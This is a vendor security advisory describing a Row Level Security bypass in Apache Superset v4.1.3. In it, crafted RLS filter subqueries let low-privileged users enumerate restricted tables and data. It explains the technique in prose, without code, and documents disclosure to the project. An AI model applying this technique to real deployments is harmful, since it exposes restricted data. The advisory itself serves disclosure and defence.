OX Research Uncovers Critical RLS Bypass in Apache Superset v4.1.3 Affecting All Deployments
Severity: Critical
Affected Versions: All versions of Apache Superset, including v4.1.3
Impact: Row Level Security bypass allowing low-privileged users to infer and enumerate data from restricted datasets, enabling systematic database enumeration
TLDR
Apache Superset is an open-source platform for data exploration and visualization, capable of handling very large datasets. Originally developed at Airbnb in 2015, Superset is now used by many organizations to create interactive dashboards and run SQL queries directly on connected databases through its SQL Lab interface. As of 2025, Superset has over 69,000 stars and more than 16,000 forks on GitHub, reflecting a vibrant and active open-source community.
The OX Research team exploited an access control bypass in Apache Superset (v4.1.3) that lets low-privileged users infer and enumerate data from restricted datasets, enabling systematic database enumeration.
Impact
- Unauthorized inference and enumeration of sensitive data
- Exposure of database schema, table names, and metadata
- Bypass of Row Level Security and dataset-level access controls
- Increased risk of further exploitation based on leaked structural information
Who Is Affected?
All organizations running Apache Superset, including the latest version (v4.1.3), are potentially affected. Any deployment where users have dataset-level access with RLS enabled is vulnerable, allowing low-privileged users to infer data and schema information from restricted datasets.
Based on Shodan: Over 20,000 publicly accessible Superset instances that could be exposed to this issue.
Responsible Disclosure
We contacted the Apache Superset team on July 14, 2025, and they responded that a fix will be issued.
Recommendations
- Apply security updates and patches once the Apache Superset team releases a fix
Technical Analysis
Attack Scenarios: How could this be exploited in the wild?
- A low-privileged Superset user crafts RLS filter clauses containing subqueries that reference restricted tables.
- By observing differences in query results or error behavior, the attacker infers the existence of tables, schema details, and data values they are not authorized to access.
- The leaked metadata can then be used to target sensitive datasets or support further attacks against the underlying database.
Attack Graph
How it works
Apache Superset applies Row Level Security (RLS) rules by appending user-defined filter clauses to dataset queries. Due to insufficient validation of these clauses, a low-privileged user can include subqueries that reference tables outside of their authorized scope. Although direct access to those tables is denied, the database still evaluates the subqueries. By observing differences in query behavior and results, an attacker can infer the existence of restricted tables and data, enabling systematic enumeration and bypass of Superset’s dataset-level access controls.
While testing the latest version of Apache Superset (4.1.3), we created a user named test_user with access limited only to the “messages” dataset:
When attempting to directly access the public.”FCC 2018 Survey” dataset as test_user, access was correctly denied:
Based on the differences in responses caused by values in tables that test_user does not have access to, we were able to develop a Python script that systematically enumerates the presence of tables across the database. This script leverages the RLS clause behavior to infer the existence of restricted tables, as demonstrated in the images below:
This made it possible to enumerate all available data in the database, despite test_user lacking direct access permissions. By crafting targeted RLS clauses and analyzing the system’s responses, we could infer the structure and contents of restricted tables – effectively bypassing Superset’s dataset-level access controls.
Too Good to BI True
This advisory is part of Too Good to BI True, OX Security’s research into the security posture of the most widely deployed open-source Business Intelligence platforms. Across five platforms, our researchers achieved full exploitation chains in every single one — reaching data that should never have been accessible. The findings include four zero-day discoveries and over 45,000 publicly exposed instances.
Read the advisories:
